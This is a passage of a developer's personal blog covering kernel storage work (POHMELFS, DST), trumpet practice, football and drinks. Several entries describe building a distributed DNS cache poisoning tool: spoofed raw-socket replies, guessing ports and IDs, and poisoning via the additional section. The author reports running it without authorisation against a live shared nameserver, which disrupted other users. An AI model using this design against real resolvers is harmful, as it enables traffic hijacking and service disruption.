time when normal people sleep, drink or have a sex, but do not work and watch DNS server load.
The only problem actually is that those servers were also used for
POHMELFS
development and testing. Although I still able to work with two Xen domains
(where I actually develop and test initial implementations without various
stressing loads for all my current projects), so development will not stop.
I will pretend to be an idiot and to have viruses there. Linux kernel viruses.
And of course I will promise I will install all updates and will be careful next time.
Next time I will not attack known nameserver, but install my own.
It is all about the science and not to harm (I even poisoned non-existent domain).
Or they will get away my toys and kick my ass, but I will resist,
so there will be no interesting notes about DNS cache poisoning
attack (although not, I will be able to run one on my desktop
via loopback, it is quite fast machine) and nice benchmark graphs :)
Today I managed to play C trumpet (Bb concert) note in third octave,
which means I managed to play trumpet notes in four octaves (from D small
to third C). This is a major progress, and although playing very high tones
is quite unreliable (I can only reliably play upto F#-G# of second octave),
as long as very low (down to small D I think its flows good).
My dissassembled trumpet
Now I'm entering next stage of the playing: to actually play and not produce
a sound, i.e. being able to link multiple notes into a single melody.
I started with "Grasshopper in the grass" ("V trave sidel kuznechik"):
"Grasshopper in the grass" notes.
First half should be repeated two times (second time without one last C) before second half.
I belive I've completed quite distributed client/server network exploit, which is capable to poison
given DNS cache either if it works with single source port or randomize it over some port range.
I already described
client-server architecture, so only short notes here.
Client broadcasts set of ports and fake queries to number of poisoning servers, and then asks attacked
name server a specially crafted query, which does not exist in the attacked domain. Poisoning servers send
lots of replies to the attacked DNS server with fake IP addresses and ports, which pretend to be address/port
from the authoritative DNS server. Each reply contains answer section for the current client query and additional
section, which contains information about attacked domain: the former is a subdomain of the latter, like
querying 'IN A' record for '123-456.www.blahblah.com' while reply contains 'IN A' data for '123-456.www.blahblah.com'
in answer sectino and 'IN A' data for 'www.blahblah.com' in additional section.
Client then checks reply (or falls on timeout), and if it does not contain given record for the query, sends next packet
to poisoning servers and appropriate request to the attacked cached domain server.
So far I did not succeed in this attack, but managed to load network (and actually the main name server) so much, that really lots of people around started to complain,
that they have troubles... This is also a result actually, but not that one which I expected, so I will postpone attack to the
late night today.
Tcpdumps show that broadcasted data is valid, but there were no actual poisoning, so probably I will install own
server and configure it to use single port. Currently attacked server has not very random
port distributinon, but still not constant. My poisoning servers (two servers connected via gige link to the same network as attacked server)
use 100% CPU each one, since they need to caclulate UDP checksum for each packet (since it has different ID and/or port number) and
use raw socket to transmit data (to specify source and destination addresses of the autoritative and attacked server). Each server is
usually capable of transmit about 30k-130k packets per second, which corresponds to 1-20 ports (and whole 64k ID range per port)
during 5 seconds timeout interval before the next request. This is not enough of course for the 100% guarantee, but I think after quite long
time attack may suceed, so I will put it in action for the next weekend or at least a night.
Bert Hubert made some math on this kind
of attack, result is not very promising for the attacker, but still probability is far from zero.
I do not promise success, but would like to know, if I'm on the right side, so attack has been started...
P.S. DNS has own tag in the blog now.
P.P.S. Distributed cache poisoning exploit (it may be completely incorrect!) source code can be found in archive. Sorry,
no usage details, but you can use '-h' command line parameter :)
SO far I only implemented simple flooder of the requests,
which as number of destination ports as a parameter and two
names and addresses to put into answer and additional section
of the DNS reply. It uses UDP socket, so source address does not
belong to server, which should pretend to answer given query, so
actually this application will not work, and I need to implement
sending via packet socket and substitue source IP address with
DNS authoritative server's one.
Poison flooder also should not use only one name/address in answer section,
but insteda it should iterate with client, so appropriate request
and answer were synchronized.
So far, initial design of the client/server architecture of this
small project looks like this: depending on flags, either client
connects to multiple flood servers or vice versa, then client
sends a message to each server where specifies a port and ID ranges to attack,
attacked DNS server IP, requested query name and source address,
pretending to be an authoritative name server and additional resource
record data to put into replies (which will poison the cache).
Each server starts sending that data to the specified name server
with changed source address to the authoritative name server's one
and with ID and port changed in given range. When client finished
broadcasting request data to all flood servers, it sends a request
to the attacked DNS server with given query name to resolve. Now
flood servers race with authoritative one to provide an answer. When
client receives the answer, it checks if it looks like poisoned data
we wants to get, or real answer (which should be NX domain, since we
resolve non-existing names). In the former case we exit the process and
enjoy the result, otherwise client specifies next name to resolve and
the same starts again.
Exact time to hack a DNS server is a middle of the night: 3 A.M. here
and I've just completed initial draft of the trivial DNS server, which
is only capable to receive a datagram from predefined port, parse it,
fill a reply for static "IN A" record (I think I will add a config file),
this record is placed into 'answer' and 'additional' resource record sections,
then the whole request is being sent back to the client.
That's how it looks for standard UNIX dig command:
$ dig @localhost -p 1025 www.google.com
;; Warning: query response not set
; <<>> DiG 9.4.2-P1 <<>> @localhost -p 1025 www.google.com
; (1 server found)
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 51486
;; flags: rd; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; WARNING: recursion requested but not available
;; QUESTION SECTION:
;www.google.com. IN A
;; ANSWER SECTION:
www.google.com. 123456 IN A 195.178.208.66
;; ADDITIONAL SECTION:
www.google.com. 123456 IN A 195.178.208.66
;; Query time: 15 msec
;; SERVER: 127.0.0.1#1025(127.0.0.1)
;; WHEN: Wed Jul 30 02:56:23 2008
;; MSG SIZE rcvd: 64
There are several warnings, which I will fix later, but main part is
section content: www.google.com obviously does not have an IP address
of my blog site. TTL usually also does not equal to 123456.
Game continues, while I need some sleep...
DST
got full transaction support (resending, timeout completion, error recovery,
memory pool allocation for all kinds of transactions, single transaction
allocation per IO request),
socket processing (initialization of the connected and listened sockets,
failover recovery of the connection, receiving thread, network helpers),
crypto processing of the requests (thread pool utilization for crypto operations,
cipher/hash initialization, cached pages for sending crypto processing).
Thinking of moving receiving and listen/accepted sockets processing to the thread pool too,
likely it is a way to go, right now they have own threads.
Missing bits include the actual data sending/receiving and client accepting by
listened socket (and appropriate initalization of the all needed infrastructure).
This is a quite major part, but likely it will be completed sooner than later.
Gathered today's late night, so that DNS server would
not be too much disturbed by other users.
Graphs below show some BIND (do not know version)
source port cloud and distribution for a thousand
runs. Each request issued non-existent subdomain of
controlled domain server, so I was able to capture dums
and analyze them a bit.
This graphs show source ports cloud and its distribution.
Each histogram corresponds to number of hits into 100 ports range,
start of the range is shown at X axis labels.
First, port range is randomly selected in 50k-65k range,
so one needs to guess much smaller amount of port.
Second, even in 1 thousand requests there are lots of
requests with the same port (stats show that there 149 ports,
which were used 2 and more times in above 1000 runs,
there is even single port which was used 4 times).
If we select range of 100 ports, then appropriate distribution
is shown on the graph.
Such behaviour allows to limit source port range even more.
Now, DNS IDs.
The whole range of IDs is used, and theirs distribution (each histogram
corresponds to number of IDs in the appropriate 100 ids range) is more uniform.
There were only 9 IDs used twice per 1000 runs.
But since I do not know exact load of the analyzed DNS server (and it can be
high even at 3 A.M.), I can not say if that numbers are due to port/id
selection algorithm implementation of just because load was high and there were
actually not only my 1000 requests.
To further play with DNS caches I decided to install local
DNS server first test things with it.
Common LISP Cookbook has such interesting
things like threads, socket and foreign function interface.
I belive "Common LISP Cookbook" and "Practical Common LISP"
form a must-have library for every LISP programmer. So far I think that that's all what is needed,
since this set covers vast majority of possible usage cases. Even DSL are covered there in details.
Today I implemented simple thread pool subsystem, which allows
to create set of threads, to add/remove them them from this set
in run-time, and to schedule a work to be done by them. Work
is specified as to functions: setup() - it is called when
system has selected a thread for execution, so caller can
setup needed data, and action() - it is called by thread itself,
it has access to the data, provided at initialization time.
Work scheduling has a timeout parameter, which corresponds to
time system will wait for free thread, otherwise error is returned.
System is generic enough not to contain any notion about DST or crypto,
only two new data types: struct thread_pool and
struct thread_pool_worker, only the former is visible to the user.
API looks like this:
void thread_pool_del_worker(struct thread_pool *p);
struct thread_pool_worker *thread_pool_add_worker(struct thread_pool *p,
char *name,
int (* init)(void *private),
void (* cleanup)(void *private),
void *private);
void thread_pool_destroy(struct thread_pool *p);
struct thread_pool *thread_pool_create(int num, char *name,
int (* init)(void *private),
void (* cleanup)(void *private),
void *private);
int thread_pool_schedule(struct thread_pool *p,
int (* setup)(void *private, void *data),
int (* action)(void *private),
void *data, long timeout);
init() and cleanup() callbacks above are used after
new thread is created, so that user could initialize per-thread data,
for example it is used to allocate some cached pages and initialize
crypto algorithms.
This thread pool system is used by the crypto processing code in
the distributed subsystem: when block io request is about to be sent,
or when system has received reply for the read request, it schedules
crypto processing work to the pool, initialized at DST node setup time.
Crypto processing does not yet work in DST as long as some other bits,
so far I only played a bit with its initlialization sequence, so it was
split to network, crypto, security initializations and node start, which
registers new storage in the block layer subsytem. This steps allow to introduce
later additional initialization steps if needed without breaking backward
compatibility.
Next steps include proper network initialization and processing and transaction
management helpers. Then I will combine all existing code and make a first
renewed release.
Stay tuned!
There are two types of this attack: DNS query ID guessing and
request source port guessing for servers which use randomized source
port, which should be turned on after Dan Kaminsky's
alert.
DNS ID is 16 bits only, so it could be guessed rather fat, one just need to force someone
who uses attacked DNS cache to issue appropriate requests. When request is received by
DNS resolver, it is stored there for predefined amount of time (TTL parameter provided
by higher-level DNS resolver or eventually authoritative name server). Dan found, that
attacker can actually ask not for attacked domain, but some subdomain of it
(if attacker tries to point www.microsoft.com to own IP, it can force sending DNS
requests for 1.microsoft.com, 2.microsoft.com and so on), and put data about actual
target into additional resource records attached to all datagrams. So, when it eventually
win the race, it can store (among lots of subdomains) needed pointers in the attacked DNS cache.
I've just thought that this attack will not be possible, if all queries from DNS
resolvers to higher-level resolvers and/or authoritative name servers would happen over
TCP instead of more common UDP. There is no need to issue requests from random ports anymore,
no need to parse and drop additional resource records. There will be no problems with truncation
of large messages... But to play a bit with the whole idea I'm implementing a simple DNS
query/response processor. Maybe will play a bit with local cache (ISP at office uses only 6 different
ports to send requests) poisoning, although its main goal is
IP-over-DNS tunnel.
This is kind of a real rest after VISA/hotel paperwork. I was told, that if I will be
called to embassy for the interview, chances are high VISA will be declined because of my
sence of humor :)
And DNS protocol gets the first price among the ugliest crappies.
Now its time to create a DNS server itself, which will get requests (above dump shows BIND session),
parse them and perform appropriate actions, like sending reply with specially crafted additional resource
records, either NULL one for example (can contain upto 64k of data) or TXT (length byte followed by
character string, there may be multiple strings as long as total length (including length bytes itsef)
is less than 64k). Or additional A resource record, which may contain information about domain to poison...
This release was fully made by other developers. Thanks a lot for your work.
I only updated some trivial bits and fixed bug in the server.
Short changelog:
Documentation update by Adam Langley (agl_imperialviolet.org).
Now one can read properly spelled POHMELFS design.
Server and configuration utility IPv6 support by
Varun Chandramohan (varunc_linux.vnet.ibm.com). Kernel client
does not need this changes, since it supports any protocol.
Now one can create POHMELFS cluster over IPv6.
Server bug fix and small documentation update by me.
One can get more detail about POHMELFS at its
homepage.
Sources can be downloaded from archive
or via GIT tree.
I accumulated patches from Varun Chandramohan of IBM Linux center,
which add IPv6 support to the POHMELFS
server and configuration utility. Kernel client does not need it, since it works
with any kind of addresses (by design).
I also wanted to add documentation update from Adam Langley, but apparently
I accidentally deleted his patches, so release is being postponed a bit.
Meanwhile I made some little progress at DST
development side. Added trivial configuration bits and started to develop cryptography part,
mainly configuration (which I will copy from POHMELFS) and thread pool subsystem.
The latter is rather simple patch, which will allow to create a thread pool, to add/remove
threads on demand and to queueu a work to the pool. In theory this can be a generic
enough patch to be used by other users (I even saw some kind of topic proposal for
kernel summit), but so far I'm not going to push it separately from DST. Main goal
of this system is crypto processing of the BIOs for the distributed storage.
I do not, so there are no photos with me on this site
(if you would see my passport photos...). But I like to make
them and sometimes I create really interesting ones.
People even print them and give me presents for it, and since photos were
made in public, I think I can publish them.
Although I frequently make photos of people when they do not expect it in public,
and this ones are really the best (never look at photographer!).
I sometimes make them to laugh on someone, this is of course a private data,
which I only send to the 'model' if not delete immediately.
My theory stands on the matter, that all people are very interesting from the photographer point of view.
This just has to be found. I'm trying to do it, and sometimes I succeed.
I do not know, if it is good or not
to publish such photos. I only save pictures which are definitely interesting for me.
Of course it's just a matter of taste.
So, I'm thinking about creation of the new tag in my blog, where I will post photos made by me.
Not that much, one or so pictures per week. So if you do not like the idea, you can always
read development tag only.
After some before-sleep-reading (this time DNS RFC specifications) I found,
that DNS protocol is so much extensible, that is can perfectly cover not only its area,
but also help in really lots of close problems. It already has (though completely
unused) many interesting RRs and types, which have nothing to deal with DNS
(like NULL RR, which allows to transmit binary data or TXT RR, which also is not
related to DNS area). And the most popular RRs are A, PTR, SOA CNAME and MX. That's all
from about 20 others. The same applies to (q)type and class (I first time read
about Hesiod class for example). And DNS allows to introduce own classes, types and resource
records.
It is just not used, but we could create distributed DNS system with new types.
It would be really simple (and actually it can be done even without new DNS extensions).
But it is not actually needed, since people are used to have DNS just like it is.
Another example is internet video. There is de-facto Adobe standard, no matter what W3C will
put into its new standard, everyone will continue to use existing one. Just because it works
ok. Not excellent or perfect or whatever, it just works how we used to know.
And there are lots and lots similar examples.
People are so much intert in this questions (although I think in most areas, just because
it is convenient not to do something better, when existing solution just works, even
if not perfectly and even if not good), that no one will ever bother to change something
dramatically, because it will not only require huge amount of money, but also changes in the
way people used to think about given area, which is likely even more complex (and money-hungry)
problem.
All this talk is about simple thing, I just opened for myself: when you created something
completely new, even if it is not the best solution for given problem, if you will start
pushing it to wide audience to be used, then you are able to get all 'the market'. That's why
when you have something new
on the market, where most of the users already used to work with one or another solution,
(and even if your project is potentially very good and definitely much better than existing solutions)
then there will not be any major gain, only single links to the completely new users.
This is probably told to the first year MBA students, but I was quite excited and dissapointed
by this issue: the first new idea, when properly presented even if not the best solution for given
problem, can get all the users, after which they will not switch to the new one just because they
used to have it this way.
Since I'm quite busy with VISA/hotel/tickets and overall preparations
for Kernel Summit, there is no development progress, but it should be
completed very soon I think, and so I will write here some design notes
I have in mind about how POHMELFS server will be designed. It is not a
finished draft, but somewhat a rough direction paint.
POHMELFS will utilize distributed hash table approach, i.e. storage
will support ability to get an obect based on some key attached to it.
In a local filessytem we already work with hash table: directory
lookup is no more than lookup for inode object based on its name, i.e.
lookup for the value based on attached key. And although key in this
case is not created based on object itself (like hash of the content or
some other function), it still is a (turn on your imagination here) table lookup.
Cloud of POHMELFS servers will utilize similar approach. Consider a single
server in the system. When it joins the cloud (I ommit this proccess for now,
and will describe it below) first time, it is empty, so it gets some unique
id, either via administrator steps or randomly, or it just waits in the queue
to be filled with new data, so it will get id at that time, it does not matter
for now how it gets its id, but this id is propagated to some cloud of its
neighbours (or if it would be a bittorrent or napster to the main server).
There are two ideas on how to treat this ID: either as a part of the filename,
or as a nameless pointer in the abstract namespace, I will show below that actually
it does not matter.
Now, let's check what will happen when user wants to perform some IO on given file.
Every file access actually happen to inode, stored on disk. In our case it can be stored
somewhere we do not know yet where, so we need to perform a lookup to get address
of the node in cluster which contains our data. In existing schemas like bittorrent
or Lustre there is a server (or small cloud of servers) which contain mapping information
about where this or that object is placed in data cloud, so simple lookup to this server(s)
return needed info. This approach does not scale to really lots of nodes and is failure-prone.
Instead I consider completely distributed metadata storage. Let's check how system will lookup
the whole path in our case.
Each path starts from the root directory, which is '/', which in turn is a id in the global
namespace (or hash from this string or whatever else mapping), so we first need to lookup
a node, which is responsible to content of this directory. Each node contains routes only
to the very limited set neighbour nodes (in various designs this number varys, but idea
lays in the fact, that node, performing lookup, does not know which node contains needed info).
Gnutella system just broadcasted this lookup request to all of its neighbours, so each one
broadcasted it to its neighbours and so on until one of the system replied, that it contains
needed info. Amount of unneded broadcasts killed Gnutella next day after Napster was closed.
So, this approach does not scale, and instead we need to map needed directory into node address
in a more intelligent way. There are at least two the most appealing design choices: ring-based
structure implemted in CHORD and multidimensional torus implemented in CAN.
Right now it does not matter, let's assume that we found a node, which has information
about content of the needed directory. When we have that data, we can find next node (or this
info can be cached on 'parent' directory node) and so on until get node, which is resposible for
storing content of the needed object.
When new node joins the cloud it connects to one or another known node (provided either in public
service or by administrator) and sends there information about its available space, gets ID
and just waits until some client connects to it and start writing a data.
When node joins with some content, which was written to it by the system before, or written by
local users bypassing distributed mechanism, node has to tell this information to the node, which
holds parent directory. This information should be stored in each directory it exports, or it
can be provided by administrator, for example this node exports dir '/zbr' which is actually a subdir
of '/home', so node will lookup '/home' directory content owner and update its records, that now
it contains new dir. There is a problem here: what if there is already another node, which also
claims to have dir '/zbr' in '/home'? This can be handled via attached to each object extended attribute,
which will tell us the last modification date, so system can select either the last modified '/zbr'
dir or that node, which contains dir with the biggest number of the same replicas. It can be setup by
administrator.
Main advantage of this joining scheme is the fact, that we actually do not need to know content of any
object in the exported directory, we publish only high-level object, which may or may not contain some
inner file or dir. Thus we do not need to hash millions of files in the exported directory and publish
them one by one, we do not need to store information about each inner object,
no need attach full path to each object and so on.
When we will decide to split the same object between multiple node, we will need to introduce not only
name based lookup, but also extend it to the offset inside the object. This can be done by introducing
ssytem wide 'block size', so each file is actually set of blocks of given size, so when we found a node,
resposible for storing information about directory, where it is located, this node can also contain
information where each part of the object was stored.
Looks quite simple, but... Devil is in the details.
I obviously missed some bits in the design (and I created it in mind during talk being
under 'impression' of the greece spirit while talking with asm@, who suggested to look
at Kademlia project), like redundancy management of the nodes, splitting of the node content between
multiple nodes and other bits, but it is one of the first drafts, so things can be changed if needed.
Stay tuned, I will be very soon back to development process
(DST first :), since paper work for kernel summit travel
seems to reach its end.
No, it is not parts of the body I know (half of it I looked
in the dictionary), it is what is being aching right now.
Its called football.
Yes, sounds a bit scary, but that was hell the super game today.
We were much stronger, but I have to admit, that mostly because we get
a right transfer decision and selected right players at the beginning,
so our previous team was strengthenen. I managed to make a goal,
couple of nice saves and even make quite technical outplay sometimes,
which was quite surprisingly, since I did not play football for 5 years.
I would not say I'm getting into the shape, but have a progress.
I've just thought, that I do not know a way to make
some (running) application to encrypt all its data,
which hits the disk (either via swap or usual way, like
editor writing the file and all its temporary files).
I actually consider this as a very useful feature for the
editors, browsers, instant messengers and mail clients,
downloading applications and musical players and
so on. This is especially valid for temporary files, when
one expects editor to be highly secure (or even working on
encrypted partition), while its temprary files are stored
somewhere in /tmp which is not encrypted.
It could be started via some wrapper, which will tell the
kernel encryption algorithm, key, iv and all needed info,
it will attach a crypto processing callback to the process,
so when disk activity is started by given pid (swap or data writing
or reading), it is encrypted/decrypted in flight.
Kernel should check all file descriptors opened by the given
process and appropriately process them. There may be some problems
with communication with unprotected applications, which should
be thought out, but overall I like the idea...
I've just realized, that lots of my blog posts
are valid enough presentation abstracts, at least they contain
enough words describing the problem, possible solution
and overall interested for given area topics. But I
never presented such projects in english before, although quite frankly
I'm not that bad speaker in russian, at least I
am not afraid to talk and probably like a contact with interesting
auditory. After all there is this blog :) and even had number
of similar kind of presentations from 15 minutes to couple of hours
including question/answer part.
My english used in blog is rather ugly, but I rarely (if at all)
fix errors which I detect after subsequent reading of the text
in the browser (and I detect lots of them) as long as in mails
and other posts.
So probably eventually we will have interesting
talks about diferent areas, but expect to 'listen' a world-wide
language of the gestures :)
As you may know, DST
project was an attempt to implement redundant, failover resistant, flexible block level storage
subsytem. Among other features it supported ability to map multiple remote nodes via linear
or mirroring algorithms to single node, reconnect to failed node, reading balancing and
parallel writing to multiple nodes (in case of mirroring) and
so on.
Now it has gone. There is no more distributed storage you knew before, instead there is
completely new project being developed, which main goal is to provide a transport layer for
the block requests only. Consider it as Network Block Device on huge steroids. Consider it
as iSCSI on huge steroids. Consider it as ATA-over-Ethernet on even more huge steroids.
It is just an example of what all those protocols should have. And only that.
An it does not sound very ambitious, previous DST versions already supported lots of features,
which never existed (and in some cases were impossible to be added) in another block level
network storages.
DST moves further.
There will be no mirroring and overall ability to map multiple devices into single one,
instead one should use Device Mapper for this goal, since its features were simply mirrored
(although I tried to optimize them sometimes) in DST, and amount of targets was noticebly smaller.
Now DST is just a simple block device which operates on top of network connection. With just a
single exception: its done right.
Features planned for the new Distributed Storage:
kernelspace client and server
initial autoconfiguration between client and server nodes
automatic reconnect to failed target
transaction model: resending, timeout error completion, full rollback of the failed transaction
wire speed performance
data channel encryption, strong checksumming
cryptographical authentification
ability to work on top of any network protocol
barriers support (when, if any, Device Mapper will start support them, DST will not need to be changed)
flexible protocol with simple ability to extend it to needed functionality
trivial configuration
Project is being written from scratch, but it is actually very simple,
and should be quite small, so expect its first release quite soon.
It will be pushed upstream when ready.
I also managed to play second octave F# and sometimes the whole chromatic scale
down to small (minor?) octave F on my trumpet, and I belive I started to understand
overall trumpet kung-fu, but expect it is not what you wanted to read under
DST tag.
So, DST becomes smaller, cleaner and simpler. Notably, I decided to drop userspace
target completely for now.
Kernel part now operates on transaction entity, which holds a reference to the node,
where data should be sent/received. There can be at most two such nodes if block IO
request spans the boundary. In case of mirroring (which will be dropped for the first release)
list of nodes to mirror this data to will be maintained by the first node, so transaction
will not need to know about them.
In theory block request can be as much as BIO_MAX_PAGES pages,
which is 256 for now, but I decided to limit minimum node size to be not smaller than
above bio limit, so there will be always at most two nodes per request.
Each node has either block device behind it (so it will just call generic_make_request()
with different block device for given bio), or network state machine.
Network state will have two threads: RX and TX. Receive one is used to get replies for the
read/write messages, search appropriate transaction and complete it.
In case of DST server it will also handle read/write requests and generate replies, but the whole
processing will be exactly the same, client node will have a switch to process read/write requests from
the network, but they should be only received by server.
Sending thread is tricky.
It is used as fallback for non-blocking sockets, which are used first at generic_make_request()
time, i.e. when higher level user performed read or write, if block was not fully sent,
then it is queued to this thread and it will try to send the rest of the data when
polling allows. ->make_request_fn() function returns in this case and higher
layer can proceed with own operations.
Transaction is not freed until reply is received from the remote side or resending retry
count fires.
Transaction is always allocated (from the appropriate memory pool) and that is actually
all allocations in DST itself. In case it works with block devices, it is possible to clone a bio,
when it crosses the boundaries (or even always, I have to check it, but it is essentially
what device mapper with lots of own additional allocations), but it should be very rare condition.
Network stack will allocate data itself too.
That was a theory. Practice tells me, that essentially 90% of the code should be rewritten
from scratch, so I recloned the tree and so far implemented generic bits of registering
block device, creating various sysfs files and directories and other similar trivial bits.
I still plan to finish it this weekend (without mirroring), but things may turn to me a different side though...
Checked my passports and decided that if other countries allowed to let me in
with that photos, then US custom officers should not frown too much upon
current ones.
So, waiting for the results. I almost sure that I will get visa and
will met with interesting people at kernel summit and Plumbers conference,
but anyway would like to draw the line.
For instance, Zach Brown will
talk
about CRFS (as long as show
some chocolate and coctail bars around, imho the only good coctail is rum with cola
(smaller colla) and ice), so there will be something to listen.
Just finished to read this excellent
detective novell (at Amazon,
electronic version in russian).
People call it the best english humor novell for reason: it indeed is fun and interesting,
although I suspect lots of its witty satire was a bit lost in translation, but nevertheless
I do recommend it for easy reading.
And of course if you like House M.D., you have
to read this novel, and you will not waste your time for sure.
Today's morning I raped ears almost two hours,
and at the end managed to play a chromatic scale (glide?)
from second octave D (E trumpet) down to minor octave F (E trumpet),
at least that is what my Korg tuner showed. Much more frequently
I was able to play single first octave (only via descended direction
though, I did not yet try to rise tones).
Korg AW1 tuner does not show octaves, but I really do not think,
that it is possible to play one octave lower than what my the lowest
sound was, but pretty sure it is possible to have at least one octave higher
than my the highest tone, so I decided that I play several tones around first octave.
Ugh, it was supposed to move earlier to the office (before heat and traffic jams),
but instead I fucked my brain via ears (and probably neighbours were not happy
either, although I did not play on the full volume).
I believe I can produce enough sounds out of my trumpet,
so I need to have tuner, which will tell me how bad that sounds are.
So, now I'm starting to seriously tune my sounds.
So far I hope think that I can play at least two octaves, actually I mean not to play,
but to produce a sound, it is still not that simple and not always very clean. But since
I 'play' (or better say rape ears study) my trumpet only couple of months and never played any instrument (not counting
couple guitar riffs in the university) before and do not play with a teacher, I think this tuner will
be very good addition.
Yes, DST
project is alive and will beat out the crap very soon, since I decided to change its
underlying architecture, and switch to transaction model just like
POHMELFS.
This basically means that as long as system has enough RAM writing operations will be
extremely fast, reading can be balanced between multiple nodes (in mirror), transactions
can be resent, failover mechanism becomes much simpler,
and system overall will be much more robust to failures.
Transaction model also means that system requires explicit acknowlege from remote side,
and there are two possibilities here: two handle implicit ack which comes with TCP ack
packets like I experimented
before, and send explicit ack from server for each client's request. \
The former approach although has smaller performance overhead, still suffers from
the fact, that pages sent via DST are always stateless, i.e. at this layer there is
no knowledge about who sends this page. We can determine inode page belongs to, can
even get a socket when page is about to be released when ack has been received,
but we can not know from exactly which PIPE it was submitted into given socket,
so when multiple threads send the same page via miltiple sendfile()
calls we do not know when and how page will be released. We can put pipes this page belong
to into single-linked list (since page has only two unused at this point pointers: LRU
list head, and one of them is used to determine that this page belongs to sendfile()/splice codepath),
and likely traversing this list will not hurt usual users, but malicios one can
create a local DoS with this approach. After some experiments with the splice code
today I decided to drop this idea implementation for now.
There is a strong argument in favour of explicit acks from the server: this allows to make asynchronous transaction
processing (with implicit acks we can not hook into processing path, since we do not know where exactly
skb with our pages is chained), and this does not hurt perfromance (which was proven by
POHMELFS benchmarks).
So, overall plan to develop DST is to switch to transaction model and perform async processing
of all events (there are only two actually: reading and writing of the given pages to given
locations).
This task is not that complex, so I expect some new results later this week. Stay tuned!
That was exceptionally bloody cool evening!
We had three teams of 6 playerrs in each and played
on a small mini-football field about 2.5 hours, each match took
either 7 minutes or 2 goals into single gates. It sucked power
so much cool, that even exceptional tireness right now brings
kind of masochistic pleasure.
My breathing system really sucks, and actually it is not a surprise,
I did not play football more than 5 years already, but nevertheless
shoes and ball are in a good shape.
I managed to damage knees, shoulder and fingers on the leg in various
'contacts' during the game, but that's not a problem.
Our team was not the best one really, but we strongly hold second place,
and actually can fight for the first one, since all our players had long
enough pauses in own games, while first team players regulary train
in its own teams (including youth football champion).
This interpolation uses cardinal splines approach, and namely
Catmull-Rom splines. Next task is to test how the Kochanek-Bartels splines (also called TCB-splines)
behave. The latter are used in all popular 3d modelling engines. Since math behind them
is very non-trivial, I will try just to use existing formulas for hermite tangents, which
are quite simple.
Now its time to think, how to use this knowledge and how to apply given approach
to detect and decode letters on the image...
I did not play football several years already, but I've found people,
who do like it, so our games promse to be really fun and interesing!
There are already three commands (4+1 players in the team).
This will be my first game after about 5 years of football silence,
likely there is nothing in the legs which can help playing football,
well climbing likely does not correlate with it, as long as so my experience in other physical trainings,
but nevertheless I'm looking forward this promised to be excelptionally cool game!
Playing with different spline interpolation methods. So far they seems to be quite simple
when written in matrix form, so I cooked up simple GTK application to test various methods.
There is no interpolation implementation yet, since I devoted last two days to read lots of
materials about Bezier and Hermite interpolation techniques (as long as lots of papers about
distributed hash tables, which I will use as a filesystem storage base for
POHMELFS).
Next step is to squize images, so that all bold lines moved to single-pixel ones.
In theory it should not be very complex (I have an algorithm in mind), but in practice
it will - starting to recall why in the hell I
learnt LISP.
Basic idea is to transform above BW pictures into simple binary format, which will be read by LISP
application, since I do not know and do not want to devote much time to learn how to parse/process
various image formats, instead it is done by GTK application written in C. I belive LISP was
called the best language for artificial intellengence development for reason, so will try to
find why.
I'm not a major kernel contributor, but I was invited 3 times last
3 years to kernel summit.
And I will try to move to this year
one
in Portland, Oregon, at least I started some preparation process and contacted needed people.
I hope I will also participate in
Plumber's conference.
As before I will bring bottle of vodka (number of people
who wanted to talk suddenly dropped to ground) and greatly appreciate your
contact and discussion topics :)
That's of course if stars will stay in a straight line, but I will push
them a bit.
Strong cryptography support. One can encrypt whole data channel (except headers) and/or hash/digest it.
System will try to autoconfigure itself and if server does not support requested algorithms, mount will either
fail (if special mount option is specified) or disable appropriate algorithm usage.
Bug fixes.
Cryptography support is essential addition to the POHMELFS core. It was implemented with performance
in mind, so that processing speeds would not drop noticeble even in case of very CPU-hungry operations
(one can check performance graphs).
POHMELFS utilizes pool of crypto threads (its number can be specified via mount option), which perform data crypto
processing and submit it either to network or VFS layer.
Now I will concentrate mostly on userspace server features, mainly its distributed facilities, current ability
to write data to multiple servers and balance reading among them is not enough for POHMELFS, but it will be an
essential building block of the fully distributed fault-tolerant paralllel filesystem.
If this development will require some changes in kernel side (namely network protocol extension), it will be
don in the upcoming releases with possible found bug fixes.
As usual, you can grab sources from
archive or via
GIT tree.
You can also check POHMELFS homepage
to get more details on its design and supported features.
P.S. I think I will have some rest out of this project for several days, which will allow me to concentrate on
main POHMELFS features and work out rough edges. I will switch to DST
and netchannels (main to make a new releases)
and then will devote some time to captchacracking algorithms.
If you expected a miracle, it did not happen, so I just present a picture, where
I compared plain async in-kernel NFS server (no encryption, no checksumming)
versus POHMELFS, which performed SHA1 hashing and AES-128-CBC encryption of the whole
data channel.
Block size used in iozone test is 8KB, filesize - 8GB, 1GB of RAM.
Vodka itself is very interesting drink, but depending on
situation it can be either the cheapest way to become very drunk,
or possibility to have long and fun time in a good company.
Frequently (and likely most of the time) vodka is used for the first
case only, which is sad of course.
I do not know, when and how vodka became popular in Russia, but
I think it is always associated with my country now. Actually
every nation has some kind of vodka in its own history of drinks,
and likely still has it. For example UK/Ireland has whiskey, which
is effectively vodka, but drawn in an oak barrels. This brings very
interesting taste, which allows to use it as a kind of long drink
(especially with ice). After having a whiskey shot one can start breathing
air in (especially via nose), which brings aftertaste directly into the brain
to the every piece of the body. I do not know any coctails based on whiskey.
In my opinion, Irish whiskey is much more tasty and interesting than
(probalby originals of) Scotch, although the former has much more labels.
USA also used to drink whiskey, but most of the time it is its own
labels, which I did not try yet. USA does not have own popular
drink though, or at least I do not know it.
Europe also has lots and lots of different vodka kinds.
Frech drinks cogniak. I do not like it, and belive that it is only
coloured non-tasty vodka, even likely the best labels like Remi Martin and Hennesy
(although the latter is originated by irelands :), but it is only matter of taste
of course. Cogniak creation process is a bit more complex than
vodka, and it also has very different taste, which (for me) is very similar
to clean vodka. Cogniak is one of the most popular strong drinks. Culture of its
drinking is forgotten, but nevertheless it is very interesting. Cogniak should be
drunken only with special temperature (16 degress Centigrade) in glass of specail
form, which concentrate its airtaste. Cogniak is not swallowed immediately, but
'stored' in a mouth for a while to get all taste.
Frenchmen also created absinthe. This is very strong drink (upto 90 degrees),
but its main feature is thujone. History tells us that thujone was the main reason,
why absinthe was forbidden in Europe, and it was quite strong hallucinogen.
History also tells us that its concentration never exceeded 10%, so it is unlikely
that it had some kind of strong effect. Vincent Van Gogh liked it very much,
there is even a theory that it cut his ear during absinthe intoxication, but likely
it was some special absinthe, since 10% less-to-equal thujone concentration does
